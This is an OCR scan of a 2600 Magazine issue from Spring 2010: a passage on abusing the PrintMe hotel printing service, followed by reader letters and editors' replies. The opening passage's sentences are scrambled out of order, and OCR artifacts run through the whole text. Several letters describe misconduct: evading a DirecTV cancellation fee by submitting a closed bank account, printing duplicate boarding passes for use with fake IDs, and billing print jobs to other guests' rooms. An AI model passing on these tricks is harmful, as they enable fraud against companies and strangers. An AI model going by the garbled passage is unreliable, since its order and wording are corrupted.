communication between the Interweb and the printer takes place. Obviously. W h e n you upload a file. c o m . I assume that this pre-authorization means that the printing cost is billed to your room. for that matter) to pre-determined printers provided by the location. ODF. Seal. Reading the convenient help files and FAQ also helps. ^ Spring 2010 Page 33 ^ . especially since. but pretty secure in the areas where it is controlled. it is accessible without paying for W i F i access.com) W h i l e traveling. You are.jpg or a copy of this very article? I would love to see the look on the recipient's face if they did. It is called PrintMe and comes from a company called EFI (Electronics for Imaging). are found in the human factor. plexi. and you know which room you billed it to. the state. before it gets delivered. This sets up a "no harm in trying" environment that hackers love. W h e n you submit the document. but just a fact of printing to a location that you do not control. icetoad. Unfortunately. but this is simply to send a confirmation that the print job was received and is not actually verified. and other formats). This is usually at the front desk of the hotel or the business center. The true weaknesses. so the odds are that if you act like you are in a huge rush and have to run to a meeting or a presentation. rbcp. Apple and Linux formats were noticeably absent (EFI. there must be some sort of limit to drive space. as always. decoder. this is not a good situation because there is nothing stopping me from printing something using someone else's room number and having them pay for it. Most places charge a per-page fee. I ran across an interesting service that is offered by many hotels. walk down and intercept the delivery. document formats. it really should be locked down by strict policies on the client side to prevent abuse. a little social engineering goes a long way as well. W h i l e this seems like a fine way to limit people from uploading files to be used for something like a rogue FTP server from the printer's hard drive. Nick84. The list of file types that it supports is predictable and includes several graphics formats. if you are reading this. please add . Enigma. It will automatically search for PrintMe eligible printers on the network. it only defaults to the local network discovered printers. I am not condoning this dick move. The system itself is not only handy. Nothing gets queued but. while others are free.pages. Adding insult to injury. PrintMe is offered by hotels and other places to allow customers to print from their rooms (or anywhere. The printing itself is not handled like a normal print job. If a local printer is not detected. you have the option to have the item printed and delivered to your room. W h i l e this can be a handy service to many people. and everyone supporting the Binary Revolution. The way that the system works is that the location that you are at (in my case.

nor have I found a good. We suggest going through what you have and using that to create an article hackers would be into. And for that. there is no manual. Anonymous We do want to encourage you to submit to our publication but it's important to note that articles need to be geared towards the hacker community. if so. and even gotten paid for some of it (though a t-shirt would be plenty. We have a very diverse audience and you'd be hard pressed to find topics that can't be presented in a way that would be appealing to the curious and adventurous people who make up our readers. You don't need to commit to anything. I would not accept the subscription offering. DVD encryption. and. The paper is approximately 18 pages in length. I wanted to see if you would even be interested in publishing such a thing. So to you and everyone else out there asking similar questions. And that's just a tiny amount of the potential targets of a "typical" hacker. You need to be more specific with what you're looking for and we have no doubt you'll be able to find something within those parameters quite easily on today's net. adnan c There is no one source for such things simply because there is no one way to categorize a hacker. Simply resubmitting something to a completely different type of forum probably wouldn't work out as well as if you had written it for us in the first place. Dear 2600: I am one of the guys who started up the 2600 meetings in The Netherlands and a question that I get quite often is "where can I actually buy this magazine?" Sure. succinct guide on the Inter-webs. Dear 2600: Hi. You would think this would be such an easy question to answer but sometimes our distributors make it next to impossible to get this information. what I must do to submit the paper? I would prefer to submit the paper anonymously if possible. It's probably because we could somehow undersell them if we knew exactly where they were sending our magazine or some And look. • Page 34 • 2600 Magazine ^ . what is it called and where can I download it from? Thanks. Middle Island. I have a few friends who have expressed interest in replicating my setup. We look forward to seeing it. but if it's a definite "no way . which we define as an ongoing voyage of discovery.com. NY 11953 USA. I would like to know if there is such a thing as a "hacker's toolkit" which includes the best utilities for hackers? If yes. in this case).Dear 2600: Before I pour my heart and soul into creating a three to four page tutorial on packet radio. in some cases. I wrote this paper for a final assignment in a networking security class while I work my way towards my PhD. Any idea where the mag can actually be bought in NL? zkyp This is one of those things that drives us utterly insane sometimes. Norm We get so many requests from people asking if we'd be interested in running a particular type of article and the answer most always is yes.packet radio is from the past!". I do not recall the procedures I must go through for article submission.. It seems to me that 2600 would be the ideal venue for such a tutorial. if you can make it interesting to this mindset. I've written for other magazines (see? I'm publishable). you're not even the only one asking about this very subject! Dear 2600: I have written a research paper regarding the Exploitation of General Racket Radio Service Tunneling Protocol. It's unlikely your research paper was written with the hacker in mind as an audience. double spaced. send it on in. I saw that your online list of stores is pretty outdated. I would like to submit this paper to 2600 Magazine. but a shirt might be nice. The paper has not been submitted to any professional journals. telephone networks. The email address is articles@2600. Can you please let me know if you are interested in the topic for 2600. or your own laptop. us die-hards all have subscriptions but some prefer to buy it in a store. snail mail PO Box 99. But just having exploits and programs that you can click on to find vulnerabilities is pretty far away from hacking itself. as long as it's applicable to the hacker community in some way. a research paper might be a bit dry. You could be interested in hacking remote UNIX-based systems. then I'd like to know so I can just write it up for my own blog and probably not even run spellcheck on it. That's what got me thinking about this as an article idea. but can be cut down to nine pages double spaced if the Java code to go with it is removed. That is not to say the content isn't exciting or interesting but. I searched the 2600 archives as well as I could and didn't find anything quite like that. Inquiries Speak As a lifetime subscription holder.

what's up with the Emma operator badge? W h y has it been on all of the 2600 mags in the past year? Is this just some yearly theme? Do you guys do something like this every year? Also. but I am able to use other tools to turn the bolt. would it be possible to cover this topic in your future publications? I currently use Magicjack to make international calls at cost but would like to find out if it can be done for free. Such logic is unusual in the magazine distribution business. open it up. and I am a Verizon FIOS customer (Internet/phone). making sure that their equipment is secure. If you were to pull on one of the lines. lust be careful not to be seen as the threat yourself by doing anything that could be seen as vandalism. and pull out my (or any other household's) FIOS service. In the interim. Dear 2600: I have both a problem and a question. I would like to find out if in the past you have covered the topic of "free international phone calls" using broadband. This is where the big fiber lines from Verizon come into one location (the area hub). If not. As for your question. • Page 35 • . Now I don't have the right hex socket wrench to close the door.such nonsense. We'd like to know if other readers in different parts of the country are experiencing similar issues. Whatever. That's not to say that we won't still print information on how to defeat security and trick systems. Nowadays. Last time I reported the hub open to Verizon was New Year's Day. Sheeraz You're certainly reading the right publication to get details on this. Dear 2600: From time to time. they were slow getting to their call tickets. Perhaps this letter will help wake them up. If so. telephone rates were so outrageously expensive that many of our articles focused on ways to get around those costs . however. but no lock. We could go on for many pages but that won't answer your question. and on the door is one hex bolt (larger hubs have two bolts). This is the feedback I've been getting from the well-informed Staten Islanders. I don't really know what to do. Please help! Also. let me state that I live on Staten Island (save your pity!). some more media attention certainly couldn't hurt. in a cream colored box (they look like phone hubs but are new. so if they haven't dealt with it. I purchase your magazine from the magazine shelf and I really enjoy reading articles. I came home and saw the hub still open. more people would be able to find us. it's simply the tale of a voyage. so I called Verizon and they confirmed that because of the holidays. If not. subscriptions continue to work in a far less complicated way. it isn't a problem. Verizon would deal with it. I have noticed that the main FIOS hub for my condo area is located outside on the street. the door will swing back open. O n the outside of the hub there is a door. some things just never change. These days. Allan Regarding Verizon. O n e person said that if it were really a problem. First off. My problem is that these FIOS hubs have no lock! None! The only security the FIOS hub has is a hex bolt that can secure the door shut. such endeavors are performed mostly as an exercise and less out of necessity. prices are so much lower and there are so many different methods and companies that the need to bypass the whole system simply isn't as great. Emma Nut does not appear on any of the covers but. All we can suggest is that if you find a store that looks like a suitable candidate for carrying the magazine. Unfortunately. There is. I would like to order that publication. thus securing the door. As for the Emma badge. you would be cutting off that subscriber's service. and from this hub the fiber is pushed to each condo unit or home or whatever. this would all be solved. that is her on page 3 of the Winter issue. In the past. telling them to call Verizon about it.and the only alternative was to bypass them entirely. Inside the hub you can see all the yellow fiber lines. yes. Nut on the inside of the mag. Thanks for noticing. neither can we. ^ Spring 2010 My question to you is: How can I make Verizon notice this flaw? Maybe I should take pictures and print fliers informing people about this. there are methods to making free international calls if you set things up yourself using Asterisk boxes and the like using VoIP We invite our readers to submit specific how-tos for future issues. Emma Nut? I know that it's Mrs. but no lock. This get old fast! I think Verizon should be the first ones out here every few weeks or so. If you shut the door without turning the hex bolt. however. The reality is that if we could tell people all of the locations where we could be found. most times they don't (can you believe it?). So anybody can just go up to the hub with a socket wrench. with fresh paint). a place for a lock to be. I have told' some people in the area but they don't seem to think it's a big deal. We'll be happy to take it from there. ask them which American distributors they deal with and forward that info to us. is the lady on the cover of the 26:4 issue Mrs. If they would just put one of their locks on the hub. They have a long history of neglecting their own equipment and not safeguarding their customers. Maybe I should pull every FIOS line so that the whole area is calling Verizon to lock the damn hub. I am always calling Verizon and putting in call tickets for them to come out here and close the hub. Sometimes they do.

One way to eliminate a number of these possibilities is to call from a different number. as many people who think they're being secretive really aren't when their aliases are tied to their real names all over the Internet. Thank you in advance for any consideration or any information you can provide me with. If privacy really matters to you.2600. I have a rather unique hack that has not been published anywhere as a whole tutorial/information document. I got this weird message: "The person you are trying to reach is not accepting calls at this time. as you rightfully surmise. The final possibility is that your specific number is being blocked. Alex If you were able to figure out how to send us a letter without an issue in your hand. nd All you have to do is tell us what name/handle you want to use or not use and we'll respect that.) Dear 2600: I was curious about submitting information anonymously to 2600. The whole world is watching. We have basic guidelines which can be found on our website or by emailing meetings@2600. the best thing to do in the future (assuming you eventually lose this issue too) is to go to our website at www. The phone may also be turned off with no voicemail option enabled. making it a trivial matter to figure out who they really are.com but isn't it better to learn how to solve problems and not just get the answers? (The answer is yes. wondering what a meeting would formally consist of. Dear 2600: I am very interested in joining one of your meetings. Dear 2600: I recently made a cell phone call and instead of being connected to the person that I was calling. We could also just tell you to send pictures to articles@2600. I am currently studying in the field of computer security at a state university. Again. it's a collaborative effort. You are wise to be concerned about the handle you choose. Could you please provide me with Meetings • Page 36 • 2600 Magazine ' . then sending a picture wouldn't have involved a great deal more brain power. We wish you the best of luck. Please try your call again later. The service to the phone might have been suspended either because it's been reported as lost or because the bill is overdue. Message 24 NY Dear 2600: I am contacting you after seeing a meeting roster online. but have never posted. after all. one of the best ways to get to the bottom of this is to use a Caller ID spoofing system and call them from a number you know they would pick up for. as this is how communities grow. It's also possible the person chose not to take your call and doesn't have voicemail enabled. If it's consistently one or less. having emailed this to us. since you're obviously on the net. I would not be a person to be put in control of a meeting (if there is even a hierarchical system for this. we encourage you to pick a public spot that's easy to get to and where people can find you by accident. In your opinion. I am worried about using a handle that could be linked to me. as well as identifying information and even methods of phrasing that are contained within articles you write. Brainwaste We believe this is an AT&T recording. It's a phone pole that says 2600 and 1337. We'll be happy to trade horror stories or share security issues that affect various companies but we're not a consumer ratings service. There are several possibilities as to what's happening. The issue is web servers. Anonymous in Ohio This is not what we do. then great care needs to be taken in how you refer to yourself. Good luck in your quest. All you need is the desire to learn and interact with others who feel similarly.com. otherwise I would assume it is collaborative) because of only basic knowledge of deeper computer concepts. " Do you have any idea as to what this means? Any insight that you have to this would be appreciated. Can you fill me in on some info? 01 M O . then it's likely the phone is either off or out of range. Dear 2600: I have read your articles and had some good conversations with members of the group. I have an issue here I would like to ask about. There are a whole range of reviews and ratings available online that can guide you to the best service you're looking for. and furthermore exploring the possibility of hosting a meeting in West Virginia. If you go ahead with this. But you didn't hear that from us. I enjoy exploring and learning new concepts of every kind. In fact. but who is born knowing everything? Blaine You don't need to have any technical knowledge or experience to set up or attend a 2600 meeting. I've read the magazine for a long time. my knowledge is limited. Setting up a meeting doesn't mean you're "in control" of it because. especially those computationally and electronically based.Dear 2600: I lost my magazine and I want to submit a picture for the back cover. You can generally tell the difference between these last two by seeing if there's more than one ring when you call. It's as much any attendee's meeting as it is the person's who got it started in the first place.com and follow the instructions there. If you know the person. We don't share or disclose details of our mail (postal or electronic) with anyone else. who is the most reliable and economically feasible web host? I have a host now that I am not impressed with due to the problems I have experienced with a number of issues. of course it is. Ideally.

I do not know if DirecTV still allows account swapping. the account manager accepted the new (old and closed) bank account. I'm glad they were happy.. I'm currently deployed in Iraq. W e also had an old bank account that had been closed for several months. And hey. account that paid DirecTV for their service. "From Zook. W e talked for a good five minutes before the employees got mad at the guy w e were talking to (Carlos). Just flip the switch.. Among the tools offered on the web account is the option to change bank accounts. lots of the meetings would make calls to each other and have a sort of virtual meeting on top of the actual ones. (The friendly folks at DirecTV do not comprehend job layoffs and foreclosures. After listening to the Off The Hook that preceded it. 1. Rusty We've been seriously thinking of doing stuff like this but we have to also consider people who don't have access to this technology. Shortly thereafter. for whatever reason. Dear 2600: I just wanted to give a shout out to the San Diego 2600 meeting group. My wife simply substituted the active account with the closed bank account. W e were forced to cancel service early because the bank foreclosed on our home and we could not financially afford to have satellite TV where we had moved. for instance? There's always someone getting on a cell phone when you're trying to get work done. you might be getting a phone call next time you meet up. I have been looking at RF jammers on the Internet. Long story short. Call us up!" Anyway. Dear 2600: Your opening article in the winter issue of 2600 came as something of a shock to me. I will never get myself into that kind of contract ever again. It's an interesting topic to explore and there are multiple sides to every angle. we never got a call back but w e decided to call the place later and the employee said she did deliver the message and everyone smiled and enjoyed it. as Suggestions A Way Dear 2600: Anyone who has subscribed to DirecTV and. Anonymous Dear 2600: Perhaps the inclusion of a Q R Code bar code image in articles printed by submitters might make it easier to list URLs relevant to the article. and. Perhaps my perspective on the matter is a little skewed. I decided to order them a pizza and paid for it too. if you're a group that meets up at a pizza place. What if you need them for personal use like your office. I recently got the new Motorola Droid and have been having tons of fun with the bar code scanner app. it is a waste of time to try explaining it to them. However. W e had an auto draft each month from our bank v Out Spring 2010 Page 37 ^ . compliments of Telephreak. the bank continued to send us information related to the account w e had closed (a ghost in the machine). if only for one day a month. Nebraska branch of your group so I may talk to them about joining and get other info. Thanks. I finally got through to the San Diego spot which is actually Regents Pizza. You can purchase them but they are illegal. has found themselves in a shitty situation. Hmmm confusion. 2. Having our mail forwarded to our new address. etc. 2600.contact info for the Omaha. w e continue to receive mail from DirecTV. I told the employee to bring a message too. upgrade. We could do the same thing today over the Internet but then the meetings would turn into a bunch of people on their computers which is sort of what the meetings are trying to get away from. To our surprise. even though I'm thousands of miles away. Cody Burris We would also like it if our readers had that kind of power. I suggest using it if you get in a pickle and your new friends at DirecTV suddenly speak a different language than you. w e began to receive snail mail reporting problems with our account (duh!). silence. Keep up the great work. Thank you RF jammer. but what I read sounded like something that would come from the mind of a right wing Luddite. We look forward to hearing some of them. Dustin You don't need to join or obtain permission or anything like that. 3. Zook Now this is the true spirit of the meetings! Back before phone companies started to forbid incoming calls on payphones. Even though they never called up. just stop on by and feel free to share your impressions. But I suppose that will end in a few months as forwarding postal mail is only good for a year. Just a thought. These meetings are more like gatherings where you simply talk to anyone you feel like talking to and hopefully meet all sorts of like-minded individuals in the real world away from computers. but if they do. DirecTV offers web access to subscribers' account information and provides tools to manage. Dear 2600: I am new to hacking and have been learning for a while now. I had a feeling you would touch on the topic of technological dependence.) Here is how my wife found a way to escape without paying the $400 cancellation fee. A bunch of people including myself were on a Telephreak conference and I decided to call up some places that were holding the meetings for 2600. may have had to cancel their contract early. not one of the most respected voices in the hacker community. Now it would be cool to show friends practical jokes and stuff but I would like the readers to decide whether they should be illegal or not.

An article on how to capture audio from any recording or website or even YouTube video. All he is guilty of was being curious and that's not a crime. like some sort of junkie. I'd like to take this opportunity to say to Kevin and all others out there still fighting for freedom of knowledge in all media. But we agree with your suggestions on content and hope to see more such submissions. I'm not much of a phreak but these articles really bring the phone system to life and they're extremely interesting in addition to being well written.such. we've seen such examples on multiple occasions along with far worse ones. especially to see what's new in other sections of our world. In other words. all the work you'll do in the future). Much of what you wish for can be easily found on the net simply by searching for such utilities. We hear horror stories every day of people who unwittingly give out information that they never meant to be public and which. When massive amounts of people embrace the same thing at the same time. OK. they won't make sure you know where to meet them without Twitter? I say this with all the due respects. there is both good and bad that can come out of it. Hackers can be a very vocal group. So. and something that is well written and explains what is current would be interesting. not simply follow the fads and obey the commands. Learn to Stop Worrying and Love the Tech. He didn't hurt me and. From where you are. and I just wish there was more content than what is currently present to help last the length between issues. Rebeka We'll get on it. the bad is often overlooked. negated using other technology (phone numbers can be synched. simply against human nature. Also maybe how to disguise where a mobile phone call was made so the exact location cannot be pinpointed. It feels like only yesterday. at best. But there are always tricks and unexpected developments and that's what you'll be reading about here. SpiderJ To your hypotheticals. Dear 2600: I would like to see articles on how to download/capture video from websites such as Hulu. Dear 2600: I'm just writing to thank The Prophet for his "Telecom Informer" series. merely a tweeker and tinkerer of sorts. True individuals will always emerge victorious but there are way too many people out there who simply aren't thinking the implications through. Pornhub. we must be the ones to decide and shape how a bit of technology should be used. the fears you conveyed about people trusting their entire lives to technology is. is impossible to make private again. Part of our responsibility is to be cynical and in this particular realm. It didn't matter to me if he did anything that was said about him. yes. Perhaps you should have more articles about issues that are relevant to hackers in general. There wouldn't be much to say in an article other than to download and install them. w e recently marked the tenth anniversary of Kevin's release from prison. We need to wake them up. such circumstances aside. Extract MP3s from FLVs. Kaluce We are limited by financial considerations and as well as how much we can cram into an issue. he is my hero. the good far outweighs the bad. Like all technology. but honestly. he never hurt anyone. TMZ. A great example is the net neutrality article in 26:1. Dear 2600: W h y not increase the size of the mag or even the shipping frequency and put in a variety of articles from the fledgling to the master coder? I've been a reader for two or three years now. You see. ^ Page 38 2600 Magazine ' . Yet it is the illustrious Kevin Mitnick that started it all for me. and then I'm left without my next 2600 fix for a few more months. they can't read a sign on the highway? Do you really think that if a person is truly your friend. These really help with websites like rewardsl. Like a VCR except on a computer. Do you really believe that people have regressed to the point where if their G P S goes down. thank you. However. Our theme has always been to grab high tech before it grabs us. Articles on how to encrypt SMS messages. Thanks again! ^ Page 38 physical endurance in how often we can publish twEeKer Interestingly. all that would be great. things like social networking and VoIP allow me to stay in touch with home in a level that was unimaginable in wars past. Gratitude Alex Meanberg Dear 2600: I am not a hacker. I'm sure. as I truly am a fan of 2600 and all the work you've done in the past (and. Tube8. I tend to engulf it over a week or so. once out. or you can ask for them again with an IM) and. But that's not the case everywhere. Thank you 2600 for continuing to provide a printed venue for discussion like this! anonymous Dear 2600: I want to say thanks to hostileapostle's article about free trials and faking credit cards. there is plenty to be cynical about. at worst. as well as download video from TV on my computer (via TV tuner). but w e tend to be very unfocused at times. C N N (basically download or video capture from any and all websites on the Internet). from what I've seen. Articles about how to download streaming music and streaming video. is it? I myself am a curious individual and I've never been arrested for it.

in some parts of the world. At this particular theater they have a full service bar inside.. All that does is create an entire subgroup that people don't understand and don't really want to. I love how everyone >ays "hacker" is just a technology enthusiast who wants to learn. 1894) contain the word "capitalist" more than 2600 times. thank you 2600 and the rest of the comnunity for years of very interesting reading. I loved the style of writing and the story as a whole. The movie was O K and. It is about the Nixon interview that David Frost did in the 70s.racking? Well.. and of course to encourage him to write more. It's frustrating to see the uninformed only think of hacking as one thing which usually involves not obeying rules and acting immaturely. if this magazine is really into keeping he "hacker" title as a positive one. Now we want an explanation. while we were checking out the bonus features. And I was surprised by the overall level of quality.Dear 2600: I just finally read the short story "The Particle" by Leviathan in the Spring issue of volume 26. even though the methodology varies. why do most ill of the articles use the term hacking instead of . I just want to quickly say that I enjoyed it very much. keep up the writing." Dear 2600: . one buys tickets there. It can be abused just as most anything can be." yet most of the articles in the magazine . and the box office was closed. There are those who would love to package all of that up into one easily labeled bad word and leave us all there for trash collection. I walked to the kiosk and purchased my tickets. We believe it's far more constructive to steer the various aspects of the hacker culture in a common direction that shares certain values. Chrome Observations Dear 2600: My wife and I rented a movie called Frost/ Nixon. A lot of great minds lere and I am always looking forward to reading he next issue! DMUX The reason we avoid the whole "cracker" hing is because we don't agree with it. 1885.Spring 2010 • I've just picked up a copy of 26:4 and it's impressive. I have one or two observations about it. contain the word "capitalism" four and three times. you have a talent! We'll be watching these pages for more. Dear 2600: Marx's notion of the capitalist mode of production is characterized as a system of primarily private ownership of the means of production in a mainly market economy. As a counterpoint to this." volumes two and three of Das Kapital. This is just a quick line to offer him encouragement and to let him know his work is appreciated. The look of awe on the people in the queue was astounding! It's amazing and sad to see people fail to embrace technology. with a legal framework on commerce and a physical infrastructure provided by the state. Tell us more! What was the particle? What happened after it left the building? Leviathan. The articles in your magazine are some of the most ineresting ideas and thoughts. and of course "cracker" is the Dne who wants to cause havoc and do negative :hings. Engels made more frequent use of the term "capitalism. I just laugh at some of the articles :hough because every "hacker" wants to keep the 'hacker" term positive and not associated with 'cracker. Well.. even if havoc does occasionally result. I know the difference. We're glad we stuck with it. Clearly. The three combined volumes of Das Kapital (1867. But it's just not that simple. respectively. we came across something that really blew our minds! I did a screen capture of it and thought I would share it with you. The address was 2600 Virginia Avenue NW. I really never got caught up in all the politics of a hacker versus a cracker. It's the real reason we chose this name. but I always see letters to the editor about the comparison. Hacking is a science. as is the free spreading of information and the spirit of rebellion that goes along with it all. Derf Well. and when the box office is closed. both edited by Engels after Marx's death.ay "how to hack your. plastic has become so prevalent that crowds gather to stare whenever somebody flashes old-fashioned "money paper. after all. We all have a lot to learn from each other and the way to do that is to be as inclusive as we can be. Rather than waiting in line. 1) I think whoever does your covers does Page 39 • . but the way to deal with it is not to simply create a new word and try to separate the good from the unworthy. My question is. ) Gonzalez Yes. I have every issue to date from 1984 to the present. sometimes significantly.. hack that. there is an element of that in our community. Matthew Did all of these people just time travel from before 1990? It's hard to imagine finding so many of them who didn't know about credit card purchases. I found that there was a line of 30 people in front of me waiting to purchase tickets.. but the credit card kiosk had no line.. and so on and so forth. Dear 2600: I went to see a popular movie today. Exploration and experimentation are positive forces. We don't hink the articles we print are about doing negaive things at all. we knew this was going somewhere. I love reading old issues and seeing how accurate and inaccurate articles were about the future of technology. we knew that the Watergate Hotel has a big 2600 underneath its name in one spot. Dear 2600: I have been an avid reader for years." lack this." "hacking an election.

VVe wouldn't be around today without the incredible support people like you have shown us over the years.e. E85 We really appreciate our readers looking out for us because there is so much that can work against us in the retail world. I am half wondering what would happen if I took an old USB flash drive and plugged it in. Obama came in . Dear 2600: Having purchased 2600 and various other magazines from three different Borders locations. I also noticed that it had this signature pad. As for the piece you read on page 4. See reports current today about treatment of citizens and their computer hardware over receiving leaks about matters in Washington. that has long been the place for our editorial and is hence unsigned. 5) I can see you arguing " w e are technical. I have noticed that every time the cashier scans a periodical. We're glad to see such interest and thinking. some sort of a brief "cover story" piece of work about the history of the material there and how it arrived at your cover status. We certainly hope that there are safeguards in place. Bush went out. But if there aren't. these very interesting covers need something in back of them that's not there. I thought the "Telecom Informer" piece on page 13 was needed consumer information. and I feel certain eyes in Washington are taking it all in morally. and I'll fetch out stronger eyeglasses. However. I forgot to take note of the only program I could find on the desktop. and it has "interesting social history" all over it. the covers have different interpretations and we don't want to dictate which one is correct. leaving publishers completely unpaid. but I think it needs an author name of some sort. Hope that means that you guys get credit for it. But what I really noticed were the U S B ports on the side of the monitor. So if something is good enough to wind up on your cover. I noticed a PC in the room." Titeotwawki "One or two observations" indeed. For example. We only hope we prove worthy of this in the future. I started looking at it and finally started messing around with it. there's nothing there. not political. This Obama (and his wars now) has consequences. they all relate to the subject matter we cover in one form or another.but it seems the Obama I voted for was a PR construct and I'm not awfully pleased with the Obama I got. isn't it good enough for a few words about it? 2) Yours is certainly a publication for young eyes. letting people know this is a valuable public service. the U P C number is displayed on my receipt. While I was sitting in the ER trying not to itch. 4) I thought your "Smart Regression" piece on page 4 was commentary on today's issues that won't go away. What I want to comment about is something Page 40 2600 Magazine ' . your current cover just reeks of the 1910s. and Thank You for that piece of work. First off. very well.. You have the power to keep them going. To answer a couple of your points. I'm a lifetime subscriber and I love the magazine. they must type in the price. The only thing I noted was that it was athaneMD or something similar which I assumed would come straight to a password screen (or at least I hoped it would -1 didn't get brave enough to try). but beyond that. It seems to me that this could be a big security risk where someone could sneak into a room and download a lot of info. On the plus side. Not the least is three letter agents running roughshod over citizens just like in the Bush days. Publishers are at the mercy of the distribution and retail industry who basically change the rules to suit themselves.. etc. 6) Finally. stores that bill us for issues they lose track of for whatever reason. Now this really perked my interest. And. Hopefully I don't have the opportunity to check this out again anytime soon. If not a person.them very. namely. 3) I've seen these "Magicjack" things around but I classed them in the "too good to be true" category. but it puts a lot of content into a small package. stores and distributors regularly go bankrupt. i. Keep up the good work. Keep up the good fight. The Shadow Factory. then how about "Editorial Staff" or something of that sort? The absence of an author name at least makes classification and indexing more difficult. China and Iran are certainly leaders with this technology. With all that control stuff out there. not paranoid. it seems to me the separation between these two has entirely vanished. Bamford. This is something to keep in mind for any publication you wish to support. I don't see a lot of attention to personal and civil rights and about how society degrades if these rights are "controlled. W h i c h makes your "Pwning Past W h o l e Disk Encryption" piece definitely sensible.. Being my curious self (I started reading 2600 back in 2006). Suffice to say. Dear 2600: I recently and unfortunately had a visit to my local hospital due to a really bad allergic reac- tion. the list goes on and on. If there is a security risk. I'd like to see more in your issues about China and Iran and Internet control and censorship. Dear 2600: I just wanted to drop a quick note to give you a little feedback. stores that order way more than they need which forces us to print more which we then have to refund them for. Stores that don't put magazines out and then bill us for unsold issues. to make it even more fun. I hope you'll stay with this. I imagine that doctors among medical staff could use this to sign off on treatments. it's important that we confront that. Robert While most people would probably react with indignation that you would dare to mess with a machine in a hospital." but today. There is plenty there if you look for it. the fact is that this machine is just sitting there without any supervision.

" I've finally realized that old can also be good. which was coincidenally the first place I ever found your magazine n 2000. and flick through ibout 150 news stories in an RSS reader but nev. which is about as of'ensive and rude as you can get in the world of oublications. this little annoyance seems major! Keep up the great work. I then saw your article about the 2004 R N C (quite timely article). . Not being able to do business with wimps is a real medical problem and you have our full sympathies.that bothers me with how you do the Letters section of the magazine. Security implications are pretty high. Remember all of those old movies where someone was racing to catch the love of their life before they took off in a plane and they would always run all the way up to the gate right before That night. O n page 53. like most of your readers. cover to cover. Oear 2600: I had to look up the phone number for the ocal Barnes & Noble. I haven't tested if there's a time constraint. if you can. Granted. since "didn't have the time. crybaby viewpoint. Since that day. convinced ourselves that this is in fact a big deal. It's lot that I didn't want to read it. whiny. Since they're generated by the machine as opposed to a computer printout. Moose (who is emailing this from Afghanistan) Wow. a couple of fake IDs will get multiple people into the terminals with one passenger name if it passes their scrutiny. It seems that if you use a self check-in with no luggage checked in on a certain airline (anagram is untied). G A We all have our weaknesses. and then I realized hat all I'd have been doing otherwise would've aeen watching the TV and surfing the net. you can print as many boarding passes as you want. Why do you break the letters up like that? Would it have been that hard to just make page 46 the final page of letters? The reason I bring this up is that I. they're less likely to be scrutinized (one was even the thick paper). but yikes. keep all the articles and sections together. We may have even jumped backwards on a couple of occasions. I still use the web almost as much as I did before but whilst more and more people dismiss print as "old media. Then I just decided that I really ought to just aick it up and start reading.r end up reading any one thing for more than a ew minutes. Stay strong. Thanks for iharing. We have. I ended up finishing the mag. While this would certainly be an issue if there were no checks in place upon boarding an airplane. In the past. Quarx Not necessarily. there was only a single page of letters. This is the first time we've done this in years and you got us instantly." Well. I couldn't buy a magazine from such wimp. we don't like jumping either but sometimes it's unavoidable. Today I was just at the airport. . My new copy of 2600 had turned jp a few weeks before this important day but lad sat unread by the sofa for quite a while. for example. Dear 2600: Recently I had what can only be described as in epiphany. In the latest issue (26:4). open my laptop. but I managed to have three identical boarding passes using three different machines. Ash Dear 2600: I was on your site looking for a way to subscribe to 2600. In that instance. Bob White Atlanta. Dear 2600: Managed to crack open the Autumn issue and saw M e (I have multiple personalities?) with a letter on lax airport security. For the record. We used to do this a whole ]ot more.tick the TV on. but your article revealed a real sniffling. I was interested in your magazine. it was quite common to accompany a friend or family member to the gate of their flight. One would hope that the laxness wouldn't continue on boarding the plane (scenario is a low occupancy flight which means seats wouldn't be fought over so it wouldn't be noticed).Spring 2010 Page 41 . letters ran longer han anticipated and a column was shorter so we exercised that option. The upside is that you often end up inking from one story to another to another and liscovering lots of things. and. W h e n you break up the letters. And since TSA doesn't do anything with the bar code to actually verify that's the only time the name has been used and there can be complete separation from other checkpoints. just that I hadn't ound the time. and experienced some myself. however. I come home every night. and noticed that the only two stores in ny city have telephone numbers that end in 1337 and 2600. but in a magazine that I believe is near perfection. without distraction. I realized that the real value of reading a magazine is that you can focus on just one thing at a time. you stop the letters on page 45 to continue them on page 53. read the magazine cover to cover. I have to jump back and forth. The downside is that it :ompletely wrecks your attention span. and the experience is so much richer than half-concentrating on snippets of content. I've bought several other magazines to which I've dedicated reading time and in return I've learned all sorts of things and gotten into a couple of adventures. simply proceeding through security to the terminal is not in itself something we need to be worried about. Just a bit though. Kyle Baton Rouge The things our readers notice. TV can be a problem for many reasons but I ladn't realized quite how using the Internet had ragmented my time. it is just a minor inconvenience. I LOL'ed.

art. Dear 2600: Re: Travis H.the person boarded? Why exactly is it more of a danger for someone without a ticket to be in that area if they're subjected to the same level of scrutiny in order to get there? It's not like a weapon could be more easily smuggled in just because somebody didn't buy a ticket. I reproduce it below verbatim. This statement applies to a percentage of people obviously." which was actually an operator saying "number please?" My first number was Green-311. you would just go "off-hook" and then speak after you heard the "dial tone. and one digit for the ringing code. you found yourself in a modern day a "chat room " featuring half-second beeps about 60 times in any given minute. even the word itself. The other 60 half. pointing to her friend jerry.j seconds in that minute were silent. Sans the incessant beeps. teenage girl would reply. for everyone getting the same > signal to communicate between the beeps on a giant conference call that sounds like a conven. it seems that hacking.. It upsets me that the younger people who are born with U S B ports in their brains and a touchscreen forearm try to talk about hacking as if they even remotely understand the technology that has essentially given birth to them. 26:3: W h e n I first learned to use the telephone. If you timed it just right. etc. All telephone numbers were now five digits consisting of one start digit." she answered." etc. "hi-beepmy-beep-name-beep-is-beep-Fred-beep-whatbeep-is-beep-your-beep-name?" Invariably. the Beep Line was some sort of a screw-up in the phone system. \ "On the Beep Line. 2) Don't get me wrong . Dear 2600: I'm currently rotting away in Nassau County Jail awaiting an outcome of a federal investigation on me regarding some overseas "digital explorations. My point for all the readers is don't drink and hard drive! But I also wrote to ask for information on Global Tel-Link and to see if any phreaks have had any success with the phone system in this dump (i. therefore. Since she'd described him as a longtime trusted friend. Ohio. If you dialed the drug store number. Underground is too popular for me. so it pains me when things I like start to become trendy. Norm Thanks for this fascinating bit of history. ringing codes were 1 through 0 (a zero was ten pulses Telephone Tidbits ^ Page 42 2600 Magazine ' . I'd naturally assumed it was some guy she'd met at church when she was 8. it's more a chink in the illusion of security rather than in the security itself. Technically speaking. has become one of the new "hipster" like things to do. And so on. And golden. which left a trail for the feds to sniff and find just enough information to find me. So I slipped up somewhere in my many years of hacking when I started to use it in combination with excessive drinking. "Are you insane? You don't even KNOW him? Ohmygawd. Everything I've ever been interested in (music. getting past the recording and monitoring or not being charged). "dialing" was totally 